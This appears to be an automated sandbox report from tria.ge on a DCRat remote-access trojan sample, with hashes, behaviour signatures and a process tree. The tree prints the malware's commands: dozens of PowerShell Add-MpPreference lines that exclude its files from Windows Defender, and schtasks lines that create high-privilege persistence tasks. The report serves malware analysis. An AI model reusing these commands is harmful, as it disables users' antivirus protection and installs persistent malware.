Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    145s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/12/2024, 18:16 UTC

General

  • Target

    JaffaCakes118_4cbfb546ac8cfb8306a45cdbad351086702e848a39287c1a307b7b61a9b87449.exe

  • Size

    1.3MB

  • MD5

    a1cf5062e5faf2371cfcb53d29e09464

  • SHA1

    2a50ffad16c528707a7ebf453f9c0d91258ac132

  • SHA256

    4cbfb546ac8cfb8306a45cdbad351086702e848a39287c1a307b7b61a9b87449

  • SHA512

    8a14c9bcdb08770c742c52987d80d34d23da772255086c3a73515084355d72e361f39262bd6171900eabf9c71aee1985886ce04af8ac930dcf607db58c2d87e8

  • SSDEEP

    24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Process spawned unexpected child process 64 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 2 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 24 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 17 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 15 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 14 IoCs
  • Drops file in Program Files directory 17 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 15 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 39 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_4cbfb546ac8cfb8306a45cdbad351086702e848a39287c1a307b7b61a9b87449.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_4cbfb546ac8cfb8306a45cdbad351086702e848a39287c1a307b7b61a9b87449.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:244
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2084
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4712
        • C:\providercommon\DllCommonsvc.exe
          "C:\providercommon\DllCommonsvc.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Drops file in Program Files directory
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4124
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3524
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\csrss.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3236
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\fontdrvhost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1504
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\RuntimeBroker.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3840
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\de8XdyWh5a.bat"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4244
            • C:\Windows\system32\w32tm.exe
              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
              6⤵
                PID:2284
              • C:\providercommon\DllCommonsvc.exe
                "C:\providercommon\DllCommonsvc.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Drops file in Windows directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1004
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4728
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Portable Devices\SppExtComObj.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1732
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\RuntimeBroker.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1052
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\sihost.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4928
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\My Documents\DllCommonsvc.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4668
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1064
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4676
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\VideoLAN\VLC\Registry.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3684
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\DllCommonsvc.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5052
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Logs\WindowsUpdate\StartMenuExperienceHost.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4476
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\spoolsv.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1832
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\OfficeClickToRun.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3976
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\VideoLAN\VLC\locale\SearchApp.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4624
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\apppatch\de-DE\csrss.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2788
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\SppExtComObj.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3404
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Installer\sysmon.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4160
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\sihost.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3368
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\System.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1076
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\unsecapp.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3120
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Start Menu\upfc.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:516
                • C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe
                  "C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe"
                  7⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Modifies registry class
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5084
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OTxxDhnLNa.bat"
                    8⤵
                      PID:5832
                      • C:\Windows\system32\w32tm.exe
                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        9⤵
                          PID:5908
                        • C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe
                          "C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe"
                          9⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Modifies registry class
                          • Suspicious use of AdjustPrivilegeToken
                          PID:6032
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\fH1ASKIIFN.bat"
                            10⤵
                              PID:3112
                              • C:\Windows\system32\w32tm.exe
                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                11⤵
                                  PID:928
                                • C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe
                                  "C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe"
                                  11⤵
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • Modifies registry class
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3652
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\m47JVZSxDi.bat"
                                    12⤵
                                      PID:4368
                                      • C:\Windows\system32\w32tm.exe
                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                        13⤵
                                          PID:1372
                                        • C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe
                                          "C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe"
                                          13⤵
                                          • Checks computer location settings
                                          • Executes dropped EXE
                                          • Modifies registry class
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5452
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UWW2tbEWSD.bat"
                                            14⤵
                                              PID:556
                                              • C:\Windows\system32\w32tm.exe
                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                15⤵
                                                  PID:640
                                                • C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe
                                                  "C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe"
                                                  15⤵
                                                  • Checks computer location settings
                                                  • Executes dropped EXE
                                                  • Modifies registry class
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1964
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\XIQ15LoDrx.bat"
                                                    16⤵
                                                      PID:1612
                                                      • C:\Windows\system32\w32tm.exe
                                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                        17⤵
                                                          PID:5176
                                                        • C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe
                                                          "C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe"
                                                          17⤵
                                                          • Checks computer location settings
                                                          • Executes dropped EXE
                                                          • Modifies registry class
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3360
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\12JaEZR6zX.bat"
                                                            18⤵
                                                              PID:3384
                                                              • C:\Windows\system32\w32tm.exe
                                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                19⤵
                                                                  PID:4092
                                                                • C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe
                                                                  "C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe"
                                                                  19⤵
                                                                  • Checks computer location settings
                                                                  • Executes dropped EXE
                                                                  • Modifies registry class
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2960
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OTxxDhnLNa.bat"
                                                                    20⤵
                                                                      PID:1652
                                                                      • C:\Windows\system32\w32tm.exe
                                                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                        21⤵
                                                                          PID:2644
                                                                        • C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe
                                                                          "C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe"
                                                                          21⤵
                                                                          • Checks computer location settings
                                                                          • Executes dropped EXE
                                                                          • Modifies registry class
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:3296
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\YNa8GmLI5m.bat"
                                                                            22⤵
                                                                              PID:3880
                                                                              • C:\Windows\system32\w32tm.exe
                                                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                23⤵
                                                                                  PID:5312
                                                                                • C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe
                                                                                  "C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe"
                                                                                  23⤵
                                                                                  • Checks computer location settings
                                                                                  • Executes dropped EXE
                                                                                  • Modifies registry class
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:464
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7lFc7N4hi3.bat"
                                                                                    24⤵
                                                                                      PID:4192
                                                                                      • C:\Windows\system32\w32tm.exe
                                                                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                        25⤵
                                                                                          PID:1356
                                                                                        • C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe
                                                                                          "C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe"
                                                                                          25⤵
                                                                                          • Checks computer location settings
                                                                                          • Executes dropped EXE
                                                                                          • Modifies registry class
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2004
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SRNviAgREO.bat"
                                                                                            26⤵
                                                                                              PID:5408
                                                                                              • C:\Windows\system32\w32tm.exe
                                                                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                27⤵
                                                                                                  PID:5776
                                                                                                • C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe
                                                                                                  "C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe"
                                                                                                  27⤵
                                                                                                  • Checks computer location settings
                                                                                                  • Executes dropped EXE
                                                                                                  • Modifies registry class
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5764
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dFeEewS5jL.bat"
                                                                                                    28⤵
                                                                                                      PID:6040
                                                                                                      • C:\Windows\system32\w32tm.exe
                                                                                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                        29⤵
                                                                                                          PID:5676
                                                                                                        • C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe
                                                                                                          "C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe"
                                                                                                          29⤵
                                                                                                          • Checks computer location settings
                                                                                                          • Executes dropped EXE
                                                                                                          • Modifies registry class
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:6036
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lEFN0vw97k.bat"
                                                                                                            30⤵
                                                                                                              PID:1624
                                                                                                              • C:\Windows\system32\w32tm.exe
                                                                                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                31⤵
                                                                                                                  PID:1904
                                                                                                                • C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe
                                                                                                                  "C:\Program Files (x86)\Mozilla Maintenance Service\logs\TextInputHost.exe"
                                                                                                                  31⤵
                                                                                                                  • Checks computer location settings
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Modifies registry class
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:5200
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lEFN0vw97k.bat"
                                                                                                                    32⤵
                                                                                                                      PID:4984
                                                                                                                      • C:\Windows\system32\w32tm.exe
                                                                                                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                        33⤵
                                                                                                                          PID:5292
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\providercommon\csrss.exe'" /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:2988
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\providercommon\csrss.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:2888
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\providercommon\csrss.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:4024
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\providercommon\fontdrvhost.exe'" /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:4880
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\providercommon\fontdrvhost.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:3268
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\providercommon\fontdrvhost.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:4916
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\RuntimeBroker.exe'" /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:4980
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\RuntimeBroker.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:3416
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\RuntimeBroker.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:2748
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Portable Devices\SppExtComObj.exe'" /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:1624
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\SppExtComObj.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:456
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Portable Devices\SppExtComObj.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:4740
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:1240
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:4132
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:3168
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\sihost.exe'" /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:3764
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\sihost.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:640
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\sihost.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:3616
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 9 /tr "'C:\Users\Default\My Documents\DllCommonsvc.exe'" /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          PID:4768
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "DllCommonsvc" /sc ONLOGON /tr "'C:\Users\Default\My Documents\DllCommonsvc.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:4428
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 5 /tr "'C:\Users\Default\My Documents\DllCommonsvc.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          PID:2188
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:4512
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:2076
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:3112
                                                        • C:\Windows\system32\schtasks.exe
